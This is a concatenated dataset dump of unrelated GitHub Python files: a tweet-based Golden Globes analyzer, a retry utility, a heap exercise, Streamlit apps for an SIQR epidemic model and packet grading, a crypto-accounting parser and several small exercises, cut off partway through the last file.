presenters_counts[award] = [presenters_split[award].count(possible_pres)\n for possible_pres in unique_presenters[award]]\n # possible_noms[award] = list(zip(unique_noms[award], noms_counts[award]))\n # possible_winners[award] = list(zip(unique_winners[award], winners_counts[award]))\n # possible_presenters[award] = list(zip(unique_presenters[award], presenters_counts[award]))\n\n hosts = find_hosts(unique_hosts, hosts_counts)\n awards = find_awards(unique_award_names, awards_counts)\n winners = find_winners(data_year, unique_winners)\n nominees = find_nominees(data_year, unique_noms, noms_counts, winners)\n presenters = find_presenters(data_year, unique_presenters, presenters_counts)\n\n print('Forming answer...')\n form_answer(data_year, hosts, awards, nominees, winners, presenters) # serialize answers for access in get funcs\n best_and_worst(data_year, best_dressed, worst_dressed, controversially_dressed)\n end_time = time.time()\n print('Main complete')\n print('Time: ', str(end_time - start_time))\n return\n\n\nif __name__ == '__main__':\n main()\n\n# unused import statements\n#\n# import pdb\n# import string\n# from pprint import pprint\n#\n# unused functions\n#\n# def parse_text(tweets):\n# spacy_tweets = tokenizer.pipe(tweets)\n# ner = nernlp.pipe(tweets)\n# return spacy_tweets, ner\n#\n# def find_award_alt(tweet):\n# best = 0\n# best_match = ''\n# for award in OFFICIAL_AWARDS:\n# for index, token in enumerate(tweet):\n# if token.text == 'best':\n# if tweet[index] == tweet[-1]:\n# continue\n# if 'dress' in tweet[index+1].text:\n# continue\n# text = tweet[index:(index+4)].text\n# if similar(award, text) > best:\n# best = similar(award, text)\n# best_match = award\n# break\n# if token.text == 'foreign':\n# best_match = 'best foreign language film'\n# break\n# for ent in tweet.ents:\n# if similar(award, ent.text) > best:\n# best = similar(award, ent.text)\n# best_match = award\n# if best == 0:\n# return None\n# return best_match\n#\n# def find_real_names(names_list):\n# ia = IMDb()\n# real_names = {}\n# for name in names_list:\n# if name not in custom_stop_words:\n# if name in real_names:\n# real_names[name] += 1\n# elif ia.search_person(name) != []:\n# real_names[name] = 1\n# return real_names\n#\n# # found on https://stackoverflow.com/questions/17388213/find-the-similarity-metric-between-two-strings\n# def similar(a, b):\n# return SequenceMatcher(None, a, b).ratio()\n","repo_name":"racherson/golden-globe-summary","sub_path":"gg_api.py","file_name":"gg_api.py","file_ext":"py","file_size_in_byte":32619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22115301601","text":"\n# encoding: utf-8\n\n__author__ = \"Nils Tobias Schmidt\"\n__email__ = \"schmidt89 at informatik.uni-marburg.de\"\n\nfrom androlyze.model.script import ScriptUtil as ScriptUtil\nfrom androlyze.model.script.CustomResultObjInterface import CustomResultObjInterface\n\nclass ResultWritingInterface:\n '''\n Interface for the writing of the analysis results.\n '''\n\n def store_result_for_apk(self, apk, script):\n ''' Store the `result` for the `apk` which has been analyzed with the `script`.\n\n Will overwrite already existing results of the `script` in the storage\n\n If a custom result object is used in `script` and it's not a `ResultObject`,\n str(custom res object) will be used for writing to disk.\n\n\n Parameters\n ----------\n apk: Apk\n script: AndroScript\n\n Raises\n ------\n StorageException\n\n Returns\n -------\n Dependent on the implementation\n '''\n raise NotImplementedError\n\n @staticmethod\n def get_custom_res_obj_representation(script):\n ''' Get the representation of the custom result object.\n This is the data repr. that shall stored '''\n cres = script.cres\n if isinstance(cres, CustomResultObjInterface):\n return cres.get_custom_result_obj_repr()\n elif ScriptUtil.is_result_object(cres):\n return cres.write_to_json()\n return str(cres)","repo_name":"nachtmaar/androlyze","sub_path":"androlyze/storage/ResultWritingInterface.py","file_name":"ResultWritingInterface.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"72"} +{"seq_id":"924896446","text":"class Solution:\n def intToRoman(self, num: int) -> str:\n # first attempt: Recursively subtract the largest roman numeral you can from the num\n # Does it need to be recursive? is it simpler to use while loop?\n\n # second attempt: Use a dictionary instead of 2 lists and see size difference\n # also instead of having if statements for special cases, add those into the\n # dictionary as their own characters\n\n # ans = \"\"\n # values = [1000, 500, 100, 50, 10, 5, 1] # only 7 roman numerals\n # romanNums = [\"M\", \"D\", \"C\", \"L\", \"X\", \"V\", \"I\"]\n\n # for i in range(0, len(values)):\n # while(num - values[i] >= 0): # loops 7*n = O(7n)\n # ans += romanNums[i]\n # num -= values[i]\n # if(num - values[i] < 0): # check special cases\n # if(num == 4):\n # ans += \"IV\"\n # num -= 4\n # elif(num == 9):\n # ans += \"IX\"\n # num -= 9\n # elif(num >= 40 and num < 50):\n # ans += \"XL\"\n # num -= 40\n # elif(num >= 90 and num < 100):\n # ans += \"XC\"\n # num -= 90\n # elif(num >= 400 and num < 500):\n # ans += \"CD\"\n # num -= 400\n # elif(num >= 900 and num < 1000):\n # ans += \"CM\"\n # num -= 900\n\n # Second attempt-------------------------------------------------------------\n # a bit faster and easier to understand than 2 lists\n ans = \"\"\n romanNums = { \n \"M\" : 1000,\n \"CM\" : 900,\n \"D\" : 500,\n \"CD\" : 400,\n \"C\" : 100,\n \"XC\" : 90,\n \"L\" : 50,\n \"XL\" : 40,\n \"X\" : 10,\n \"IX\" : 9,\n \"V\" : 5,\n \"IV\" : 4,\n \"I\" : 1,\n }\n\n for key in romanNums:\n while(num - romanNums[key] >= 0):\n ans += key\n num -= romanNums[key]\n \n\n\n return ans","repo_name":"JeremyTaraba/LeetCode","sub_path":"Medium/Integer_To_Roman.py","file_name":"Integer_To_Roman.py","file_ext":"py","file_size_in_byte":2159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34735216020","text":"'''\n12.1. Куча и базовые операции\n\nОграничение времени: 3 секунды\nОграничение памяти: 16.0 Мб\nВвод стандартный ввод или input.txt\nВывод стандартный вывод или output.txt\nРеализуйте структуру данных «куча». Напишите программу, реализовав все указанные здесь методы. Программа считывает последовательность команд и в зависимости от команды выполняет ту или иную операцию. После выполнения каждой команды программа должна вывести одну строчку. Возможные команды для программы:\n\n1. add n Добавить в кучу число n (значение n задается после команды). Программа должна вывести «ok».\n2. min Взять из кучи минимальный элемент. Программа должна вывести его значение.\n3. size Программа должна вывести количество элементов в куче.\n4. exit Программа должна вывести «bye» и завершить работу.\n\nГарантируется, что набор входных команд удовлетворяет следующим требованиям: максимальное количество элементов в куче в любой момент не превосходит 100 000, все команды «min» корректны, то есть при их исполнении в очереди содержится хотя бы один элемент.\n\nОписание входных данных\nВводятся команды управления очередью, по одной на строке.\n\nОписание выходных данных\nТребуется вывести протокол работы с очередью, по одному сообщению на строке.\n\nФормат ввода\nadd 1\nadd 23\nadd -3\nmin\nadd -100\nmin\nexit\n\nФормат вывода\nok\nok\nok\n-3\nok\n-100\nbye\n'''\n\nclass Heap:\n def __init__(self):\n self.heap = list()\n\n def add(self, elem: int):\n index = len(self.heap)\n self.heap.append(elem)\n self.sift_up(index)\n return 'ok'\n\n def sift_up(self, index):\n if index == 0:\n return\n prev = (index - 1) // 2\n if self.heap[prev] > self.heap[index]:\n self.heap[prev], self.heap[index] = self.heap[index], self.heap[prev]\n self.sift_up(prev)\n\n def get_min(self):\n return self.heap[0]\n\n def size(self):\n return len(self.heap)\n\n\nheap = Heap()\nin_put = ''\nwhile in_put != 'exit':\n in_put = input()\n if 'add' in in_put:\n command, num = in_put.split()\n num = int(num)\n print(heap.add(num))\n elif 'min' in in_put:\n print(heap.get_min())\n elif 'size' in in_put:\n print(heap.size())\nprint('bye')\n","repo_name":"wafflelios/Algorithms_and_complexity_analysis","sub_path":"Куча(Неар)/12.1 Куча и базовые операции.py","file_name":"12.1 Куча и базовые операции.py","file_ext":"py","file_size_in_byte":3172,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18364812134","text":"# -*- coding: utf-8 -*-\n# @Author: Vyn\n# @Date: 2019-03-05 21:35:50\n# @Last Modified by: Vyn\n# @Last Modified time: 2019-03-06 18:43:37\n\n# 1: dataset\n# 2: column1 (2 - 31)\n# 3: column2 (2 - 31)\n\nimport sys\nimport csv\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nCOLUMN_DIAGNOSIS = 1\n\ndef couple(a, b):\n\tCOLUMN_1 = a;\n\tCOLUMN_2 = b;\n\n\tXB = [];\n\tYB = [];\n\n\tXM = [];\n\tYM = [];\n\n\twith open(sys.argv[1], \"rt\") as csvfile:\n\t\tcsvreader = csv.reader(csvfile)\n\t\tfor row in csvreader:\n\t\t\tif row[1] == \"B\":\n\t\t\t\tXB.append(float(row[COLUMN_1]));\n\t\t\t\tYB.append(float(row[COLUMN_2]));\n\t\t\tif row[1] == \"M\":\n\t\t\t\tXM.append(float(row[COLUMN_1]));\n\t\t\t\tYM.append(float(row[COLUMN_2]));\n\n\t#plt.subplot(10, 10, 1);\n\tplt.plot(XB, YB, 'ro', color = \"blue\");\n\tplt.plot(XM, YM, 'ro', color = \"red\");\n\tplt.title(\"Feature \" + str(COLUMN_1) + \" / \" + str(COLUMN_2));\n\tplt.xlabel(\"feature \" + str(COLUMN_1));\n\tplt.ylabel(\"feature \" + str(COLUMN_2));\n\tplt.show()\n\nif len(sys.argv) == 4:\n\tcouple(int(sys.argv[2]), int(sys.argv[3]));\nelif len(sys.argv) == 2:\n\tfor i in range(2, 30): #start a 11\n\t\tfor j in range(2, 30): #start a 2\n\t\t\tcouple(i, j);\nelse:\n\texit();","repo_name":"xesnault/42-Projects","sub_path":"MultilayerPerceptron/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34060416156","text":"import abc\nimport logging\nimport time\nfrom datetime import datetime\nfrom datetime import timedelta\n\nlog = logging.getLogger(__name__)\n\n\nclass GaveUpError(Exception):\n \"\"\"Raised by a :class:`Retryer` that has exceeded its maximum number of retries.\"\"\"\n pass\n\n\nclass DelayStrategy(object):\n \"\"\"Used by a :class:`Retryer` to determines how long to wait after an\n attempt before the next retry. \"\"\"\n __metaclass__ = abc.ABCMeta\n\n @abc.abstractmethod\n def next_delay(self, attempts):\n \"\"\"Returns the time to wait before the next attempt.\n\n :param attempts: The total number of (failed) attempts performed thus far.\n :type attempts: int\n\n :return: The delay before the next attempt.\n :rtype: `timedelta`\n \"\"\"\n pass\n\n\nclass FixedDelayStrategy(DelayStrategy):\n \"\"\"A retry :class:`DelayStrategy` that produces a fixed delay between attempts.\"\"\"\n\n def __init__(self, delay):\n \"\"\"\n :param delay: Attempt delay.\n :type delay: `timedelta`\n \"\"\"\n self.delay = delay\n\n def next_delay(self, attempts):\n return self.delay\n\n\nclass ExponentialBackoffDelayStrategy(DelayStrategy):\n \"\"\"A retry :class:`DelayStrategy` that produces exponentially longer\n delay between every attempt. The first attempt will be followed\n by a ` * 2**0` delay. The following delays will be\n ` * 2**1`, ` * 2**2`, and so on ...\n \"\"\"\n\n def __init__(self, initial_delay):\n \"\"\"\n :param initial_delay: Initial delay.\n :type initial_delay: `timedelta`\n \"\"\"\n self.initial_delay = initial_delay\n\n def next_delay(self, attempts):\n if attempts <= 0:\n return timedelta(seconds=0)\n delay_seconds = self.initial_delay.total_seconds() * 2 ** (attempts - 1)\n return timedelta(seconds=delay_seconds)\n\n\nclass NoDelayStrategy(FixedDelayStrategy):\n \"\"\"A retry :class:`DelayStrategy` that doesn't introduce any delay between attempts.\"\"\"\n\n def __init__(self):\n super(NoDelayStrategy, self).__init__(timedelta(seconds=0))\n\n\nclass ErrorStrategy(object):\n \"\"\"Used by a :class:`Retryer` to determine which errors are to be\n suppressed and which errors are to be re-raised and thereby end the (re)trying.\"\"\"\n __metaclass__ = abc.ABCMeta\n\n @abc.abstractmethod\n def should_suppress(self, error):\n \"\"\"Called after an attempt that raised an exception to determine if\n that error should be suppressed (continue retrying) or be re-raised (and end the retrying).\n\n :param error: Error that was raised from an attempt.\n \"\"\"\n pass\n\n\nclass SuppressAllErrorStrategy(ErrorStrategy):\n \"\"\"An :class:`ErrorStrategy` that suppresses all types of errors raised\n on attempts to perform the call.\"\"\"\n\n def should_suppress(self, error):\n return True\n\n\nclass StopStrategy(object):\n \"\"\"Determines for how long a :class:`Retryer` should keep (re)trying.\"\"\"\n __metaclass__ = abc.ABCMeta\n\n @abc.abstractmethod\n def should_continue(self, attempts, elapsed_time):\n \"\"\"Called after a failed attempt to determine if we should keep trying.\n\n :param attempts: Total number of (failed) attempts thus far.\n :type attempts: int\n :param elapsed_time: Total elapsed time since first attempt.\n :type elapsed_time: timedelta\n\n :return: `True` if the `Retryer` should keep trying, `False` otherwise.\n :rtype: bool\n \"\"\"\n pass\n\n\nclass NeverStopStrategy(StopStrategy):\n \"\"\"A :class:`StopStrategy` that never gives up.\"\"\"\n\n def should_continue(self, attempts, elapsed_time):\n return True\n\n\nclass MaxRetriesStopStrategy(StopStrategy):\n \"\"\"A :class:`StopStrategy` that gives up after a certain number of retries.\"\"\"\n\n def __init__(self, max_retries):\n self.max_retries = max_retries\n\n def should_continue(self, attempts, elapsed_time):\n return attempts <= self.max_retries\n\n\nclass Retryer(object):\n \"\"\"A :class:`Retryer` makes repeated calls to a function until either\n the return value satisfies a certain condition (`returnval_predicate`)\n or until a stop strategy (`stop_strategy`) determines that enough\n attempts have been made (or a too long time has elapsed). Should the\n `stop_strategy` decide to abort, a :class:`GaveUpError` is raised.\n\n The delay between attempts is controlled by a `delay_strategy`.\n\n Should the attempted call raise an Exception, an `error_strategy` gets\n to decide if the error should be suppressed or re-raised (in which case\n the retrying ends with that error).\n \"\"\"\n\n def __init__(\n self,\n returnval_predicate=lambda returnval: True,\n delay_strategy=NoDelayStrategy(),\n stop_strategy=NeverStopStrategy(),\n error_strategy=SuppressAllErrorStrategy()):\n \"\"\"Creates a new :class:`Retryer` set up to use a given set of\n strategies to control its behavior.\n\n With only default values, the retryer will keep retrying\n indefinitely until a value (any value) is returned by\n the called function. Any raised errors will be suppressed.\n\n :param returnval_predicate: predicate that determines if a return\n value is considered successful. When the predicate evaluates to\n `True`, the `call` function will return with that return value.\n :type returnval_predicate: `function(returnvalue) => bool`\n :param delay_strategy: determines the time delay to introduce between\n attempts.\n :type delay_strategy: :class:`DelayStrategy`\n :param stop_strategy: determines when we are to stop retrying.\n :type stop_strategy: :class:`StopStrategy`\n :param error_strategy: determines which errors (if any) to suppress\n when raised by the called function (`None` to stop on any error).\n :type error_strategy: :class:`ErrorStrategy`\n \"\"\"\n self.returnval_predicate = returnval_predicate\n self.delay_strategy = delay_strategy\n self.stop_strategy = stop_strategy\n self.error_strategy = error_strategy\n\n def call(self, function, *args, **kw):\n \"\"\"Calls the given `function`, with the given arguments, repeatedly\n until either (1) a satisfactory result is obtained (as indicated by\n the `returnval_predicate`), or (2) until the `stop_strategy`\n determines that no more attempts are to be made (results in a\n `GaveUpException`), or (3) until the called function raises an error\n that is not suppressed by the `error_strategy` (the call will raise\n that error).\n\n :param function: A `callable`.\n :param args: Any positional arguments to call `function` with.\n :param kw: Any keyword arguments to call `function` with.\n \"\"\"\n name = function.__name__\n start = datetime.now()\n attempts = 0\n while True:\n try:\n attempts += 1\n log.info('{%s}: attempt %d ...', name, attempts)\n returnval = function(*args, **kw)\n if self.returnval_predicate(returnval):\n # return value satisfies predicate, we're done!\n log.debug('{%s}: success: \"%s\"', name, returnval)\n return returnval\n log.debug('{%s}: failed: return value: %s', name, returnval)\n except Exception as e:\n if self.error_strategy is None or not self.error_strategy.should_suppress(e):\n raise e\n log.debug('{%s}: failed: error: %s', name, e)\n elapsed_time = datetime.now() - start\n # should we make another attempt?\n if not self.stop_strategy.should_continue(attempts, elapsed_time):\n raise GaveUpError('{{}}: gave up after {} failed attempt(s)'.format(name, attempts))\n delay = self.delay_strategy.next_delay(attempts)\n log.info('{%s}: waiting %d seconds for next attempt', name, delay.total_seconds())\n time.sleep(delay.total_seconds())\n","repo_name":"petergardfjall/garminexport","sub_path":"garminexport/retryer.py","file_name":"retryer.py","file_ext":"py","file_size_in_byte":8151,"program_lang":"python","lang":"en","doc_type":"code","stars":455,"dataset":"github-code","pt":"72"} +{"seq_id":"69813805674","text":"from collections import deque\n'''\nif waitlist, bridge empty: end\nif sum(onbringe) + waitlist[-1] > wei:\n onbridge.append(0)\n onbridge.popleft()\n\n'''\nn, bridgelen, wei = map(int, input().split())\nwaitlist = [*map(int, input().split())][::-1] # 반대로 받아서 pop\nonbridge = deque()\nfor _ in range(bridgelen):\n onbridge.append(0)\ntime = 0\nwhile waitlist or onbridge:\n onbridge.popleft()\n if waitlist:\n if sum(onbridge) + waitlist[-1] > wei:\n onbridge.append(0)\n else:\n onbridge.append( waitlist.pop() ) \n else:\n time += bridgelen\n break\n \n time += 1\n #print(onbridge)\nprint(time)\n","repo_name":"JannaKim/PS","sub_path":"swk_course/0628/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32958583906","text":"from src.classes.FillWindow import FillWindow, QtWidgets\nimport sys\n\n\ndef main():\n app = QtWidgets.QApplication(sys.argv)\n main_window = QtWidgets.QMainWindow()\n ui = FillWindow(main_window)\n main_window.show()\n sys.exit(app.exec_())\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"DaniilMashkov/MetallProfile_app","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24623347396","text":"import streamlit as st\r\nimport numpy as np\r\nfrom scipy.integrate import solve_ivp\r\nimport plotly.graph_objects as go\r\nimport plotly.express as px\r\n\r\ndef modelo_siqr(t, z, a, sigma, theta, alpha, gamma):\r\n S, I, Q, R = z\r\n N = S + I + Q + R\r\n return [-a*S*(I+(1-sigma))/(N-sigma*Q), a*S*(I+(1-sigma))/(N-sigma*Q)-(theta+alpha)*I, theta*I-gamma*Q, alpha*I+gamma*Q]\r\n\r\ndef main():\r\n st.title('Modelo SIQR')\r\n\r\n st.header('Ecuaciones del modelo')\r\n st.latex(r'''\r\n \\left\\{\r\n \\begin{array}{l}\r\n S'= -aS\\frac{I+(1-\\sigma)Q}{N-\\sigma Q}\\\\\r\n I'= aS\\frac{I+(1-\\sigma)Q}{N-\\sigma Q}-(\\theta+\\alpha)I\\\\\r\n Q'=\\theta I-\\gamma Q\\\\\r\n R'=\\alpha I+\\gamma Q\r\n \\end{array}\r\n \\right.\r\n ''')\r\n\r\n st.sidebar.header('Parámetros del modelo')\r\n a = st.sidebar.number_input('a', min_value=0.0, max_value=10.0, value=2.0, step=0.1)\r\n sigma = st.sidebar.number_input('sigma', min_value=0.0, max_value=10.0, value=0.1, step=0.1)\r\n theta = st.sidebar.number_input('theta', min_value=0.0, max_value=10.0, value=1.0, step=0.1)\r\n alpha = st.sidebar.number_input('alpha', min_value=0.0, max_value=10.0, value=1.0, step=0.1)\r\n gamma = st.sidebar.number_input('gamma', min_value=0.0, max_value=10.0, value=1.0, step=0.1)\r\n\r\n st.sidebar.header('Condiciones iniciales')\r\n S0 = st.sidebar.number_input('S0', min_value=0, max_value=10000000, value=80, step=10)\r\n I0 = st.sidebar.number_input('I0', min_value=0, max_value=10000000, value=10, step=10)\r\n Q0 = st.sidebar.number_input('Q0', min_value=0, max_value=10000000, value=10, step=10)\r\n R0 = st.sidebar.number_input('R0', min_value=0, max_value=10000000, value=0, step=10)\r\n\r\n st.sidebar.header('Otras opciones')\r\n t_max = st.sidebar.number_input('t_max', min_value=10, max_value=1000, value=20, step=5)\r\n\r\n st.header('Solución del modelo')\r\n sol = solve_ivp(modelo_siqr, [0, t_max], [S0, I0, Q0, R0], args=(a, sigma, theta, alpha, gamma), dense_output=True)\r\n st.write(sol.message)\r\n\r\n t = np.arange(0, t_max, 0.01)\r\n Z = sol.sol(t)\r\n\r\n fig = go.Figure()\r\n names = ['S','I','Q','R']\r\n for i, z in enumerate(Z):\r\n fig.add_trace(go.Scatter(\r\n x=t,\r\n y=z,\r\n name=names[i],\r\n marker_color=px.colors.qualitative.D3[i]\r\n ))\r\n\r\n fig.update_layout(\r\n title='Soluciones del sistema SIQR',\r\n xaxis_title='t',\r\n template='ggplot2',\r\n height=500\r\n )\r\n\r\n st.plotly_chart(fig, use_container_width=True) ","repo_name":"joaquin-silva/modelos-biomatematicos","sub_path":"siqr.py","file_name":"siqr.py","file_ext":"py","file_size_in_byte":2509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26036856132","text":"\r\n#TRIANGULO INVERSO\r\ndef trianguloInverso(num, i, var):\r\n return\r\n\r\nprint(\"*** Triangulo Inverso ****\")\r\nnum = int(input(\"Introduce la altura del triángulo: \"))\r\n\r\nfor var in reversed(range(0, num)):\r\n for i in range(0, num - var - 1):\r\n #espacios\r\n print(end=\" \")\r\n for i in range(0, var + 1):\r\n print(\"*\", end=\" \")\r\n print()\r\n","repo_name":"EduDN/LibreriaTriangulos","sub_path":"libreria_Tinverso.py","file_name":"libreria_Tinverso.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36887003597","text":"import streamlit as st\r\nimport numpy as np\r\n\r\nst.set_page_config(page_title=\"Packet Grading App\",\r\n page_icon=\":check_mark:\", layout=\"wide\")\r\n\r\nst.title('Packet Grading Program')\r\n#st.sidebar.success(\"Select a page above\")\r\n\r\n\r\nst.markdown('''This provides a quick and simple method to grade\r\npackets, providing fractional and percentage grades.''')\r\n\r\nTotal = st.number_input('Enter the total point value of the packet:', step = 1)\r\n\r\nPoints_float = (0,0)\r\n\r\nEarn = st.text_input('''Enter the number of points lost on each page, separated by commas, spaces, or dashes.\r\nEx: 1,5,13 OR 1 5 13 OR 1-5-13''')\r\n\r\ntry:\r\n Points = Earn.split('-')\r\n Points_float = [float(x) for x in Points]\r\nexcept:\r\n try:\r\n Points = Earn.split(' ')\r\n Points_float = [float(x) for x in Points]\r\n except:\r\n try:\r\n Points = Earn.split(',')\r\n Points_float = [float(x) for x in Points]\r\n except:\r\n st.title('Invalid method of entering points earned!')\r\n\r\nEC = st.text_input('''Enter the points awarded through extra credit.\r\nEnter 0 if none''')\r\n\r\ntry:\r\n EC = float(EC)\r\nexcept:\r\n EC = 0\r\n\r\nTotal_Lost = sum(Points_float)\r\n\r\nTotal_Earn = Total - Total_Lost + EC\r\n\r\nif Total == 0:\r\n st.write('Configure total points of assignment')\r\nelse:\r\n st.write('''Fractional Grade:''', Total_Earn, '/', Total)\r\n st.write('Percentage Grade: ', round(Total_Earn/Total*100,2), '%')\r\n\r\n\r\nst.text('''Version 1.2.1\r\n1.0 Creation of app\r\n1.1 Points entered are now the points that were lost rather than earned.\r\n1.2 Added extra credit option\r\n1.2.1 Adjusted point entry to integer if using the plus/minus buttons''')\r\n","repo_name":"PLAknazaXM/Education","sub_path":"Grading/Packet_Grading.py","file_name":"Packet_Grading.py","file_ext":"py","file_size_in_byte":1679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41246043688","text":"import utils\nimport json\n\ndef handleCelsiusFile(fileList: list):\n headerFile = fileList[0]\n fileList.remove(headerFile)\n celsiusCoins = getCelsiusTransaction(fileList, headerFile)\n print(\"#### Celsius ####\", json.dumps(celsiusCoins, indent=2),\n json.dumps(utils.getAmmount(celsiusCoins), indent=2),\n json.dumps(utils.getCoinAmmount(celsiusCoins), indent=2))\n\ndef getCelsiusTransaction(fileList: list, headerFile: list):\n transactions = {}\n transactionTypeListNum = 0\n dateTimeListNum = 0\n usdValueListNum = 0\n coinTypeListNum = 0\n coinAmmountListNum = 0\n\n for n, e in enumerate(headerFile):\n if e == 'Transaction type':\n transactionTypeListNum = n\n if e == 'Date and time':\n dateTimeListNum = n\n if e == 'USD Value':\n usdValueListNum = n\n if e == 'Coin type':\n coinTypeListNum = n\n if e == 'Coin amount':\n coinAmmountListNum = n\n\n for row in fileList:\n # Trasformo la data nel formato gg/mm/aaaa\n dateRow = utils.getDate(row[dateTimeListNum], 'celsius')\n\n transactions[dateRow] = transactions.get(\n dateRow, {})\n\n if row[transactionTypeListNum] == 'Transfer':\n transactions[dateRow]['transfer'] = transactions[dateRow].get(\n 'transfer', 0.0) + float(row[usdValueListNum])\n transactions[dateRow]['ammount'] = transactions[dateRow].get(\n 'ammount', 0.0) + float(row[usdValueListNum])\n transactions[dateRow][row[coinTypeListNum]] = transactions[dateRow].get(\n row[coinTypeListNum], 0.0) + float(row[coinAmmountListNum])\n\n if row[transactionTypeListNum] == 'Reward' or row[transactionTypeListNum] == 'Promo Code Reward' or row[transactionTypeListNum] == 'Referred Award':\n transactions[dateRow]['ammount'] = transactions[dateRow].get(\n 'ammount', 0.0) + float(row[usdValueListNum])\n transactions[dateRow][row[coinTypeListNum]] = transactions[dateRow].get(\n row[coinTypeListNum], 0.0) + float(row[coinAmmountListNum])\n return transactions","repo_name":"ralls0/Simple-script","sub_path":"python/cryptoAccounting/celsius.py","file_name":"celsius.py","file_ext":"py","file_size_in_byte":2156,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72340766952","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nINVENTARI DE CNMC Despatxos\n\"\"\"\nfrom __future__ import absolute_import\nfrom datetime import datetime\nimport traceback\n\nfrom libcnmc.core import StopMultiprocessBased\nfrom libcnmc.utils import format_f, get_forced_elements, adapt_diff\nfrom libcnmc.models import F6Res4666\n\n\nclass DES(StopMultiprocessBased):\n \"\"\"\n Class that generates the Despachos(6) file of the 4666\n \"\"\"\n def __init__(self, **kwargs):\n \"\"\"\n Class constructor\n :param kwargs: year(generation year), codi_r1 R1 code\n :return: CT\n \"\"\"\n super(DES, self).__init__(**kwargs)\n self.year = kwargs.pop('year', datetime.now().year - 1)\n self.codi_r1 = kwargs.pop('codi_r1')\n self.base_object = 'Línies DES'\n self.report_name = 'CNMC INVENTARI DES'\n self.compare_field = kwargs[\"compare_field\"]\n\n def get_sequence(self):\n \"\"\"\n Method that generates a list of ids to pass to the consummer\n :return: List of ids\n \"\"\"\n data_limit = '01-01-{}'.format(self.year+1)\n search_params = [('data_apm', '<=', data_limit)]\n\n ids = self.connection.GiscedataDespatx.search(search_params)\n\n forced_ids = get_forced_elements(self.connection, \"giscedata.despatx\")\n\n ids = ids + forced_ids[\"include\"]\n ids = list(set(ids) - set(forced_ids[\"exclude\"]))\n\n return list(set(ids))\n\n def consumer(self):\n \"\"\"\n Method that generates the csb file\n :return: List of arrays\n \"\"\"\n O = self.connection\n fields_to_read = [\n 'name', 'cini', 'denominacio', 'any_ps', 'vai', 'data_apm',\n self.compare_field\n ]\n while True:\n try:\n item = self.input_q.get()\n if item == \"STOP\":\n self.input_q.task_done()\n break\n self.progress_q.put(item)\n\n despatx = O.GiscedataDespatx.read(\n item, fields_to_read)\n tmp_date = datetime.strptime(despatx['data_apm'], '%Y-%m-%d')\n data_apm = tmp_date.strftime('%d/%m/%Y')\n fecha_baja = ''\n\n if despatx[self.compare_field]:\n data_entregada = despatx[self.compare_field]\n entregada = F6Res4666(**data_entregada)\n actual = F6Res4666(\n despatx['name'],\n despatx['cini'],\n despatx['denominacio'],\n data_apm,\n fecha_baja,\n format_f(despatx['vai']),\n 0\n )\n if actual == entregada:\n estado = '0'\n else:\n self.output_m.put(\"{} {}\".format(despatx[\"name\"], adapt_diff(actual.diff(entregada))))\n self.output_m.put(\"Identificador:{} diff:{}\".format(despatx[\"name\"], actual.diff(entregada)))\n estado = '1'\n else:\n if despatx['data_apm']:\n if despatx['data_apm'][:4] != str(self.year):\n self.output_m.put(\"Identificador:{} No estava en el fitxer carregat al any n-1 i la data de PM es diferent al any actual\".format(despatx[\"name\"]))\n estado = '1'\n else:\n estado = '2'\n else:\n self.output_m.put(\"Identificador:{} No estava en el fitxer carregat al any n-1\".format(despatx[\"name\"]))\n estado = '1'\n output = [\n '{0}'.format(despatx['name']), # IDENTIFICADOR\n despatx['cini'] or '', # CINI\n despatx['denominacio'] or '', # DENOMINACION\n data_apm, # FECHA APS\n fecha_baja, # FECHA BAJA\n format_f(despatx['vai'], 3), # VALOR INVERSION\n estado # ESTADO\n ]\n\n self.output_q.put(output)\n self.input_q.task_done()\n except Exception:\n self.input_q.task_done()\n traceback.print_exc()\n if self.raven:\n self.raven.captureException()\n","repo_name":"gisce/libCNMC","sub_path":"libcnmc/res_4666/DES.py","file_name":"DES.py","file_ext":"py","file_size_in_byte":4489,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"4979802535","text":"import re\n\n\nresolver_regexp = \"\\((?P\\w+)\\)(?P\\S+)\"\n\n\ndef resolve_subject(val, part):\n p = re.compile(resolver_regexp)\n m = p.search(val)\n if m:\n if part == 'identifier':\n identifier = m.group('identifier')\n if m.group('scheme') == 'gnd':\n return \"gnd:{0}\".format(identifier)\n return identifier\n elif part == 'scheme':\n return m.group('scheme')\n else:\n return \"\"\n else:\n return \"\"\n","repo_name":"aeonium/lw-daap","sub_path":"lw_daap/base/recordext/functions/resolve_subject.py","file_name":"resolve_subject.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5794875134","text":"'''Exercício Python 095: Aprimore o desafio 93 para que ele funcione com vários jogadores,\nincluindo um sistema de visualização de detalhes do aproveitamento de cada jogador.'''\njogador = {}\nlista = []\ntime = []\n\nwhile True:\n jogador.clear()\n lista.clear()\n jogador['nome'] = str(input('Nome do jogador: 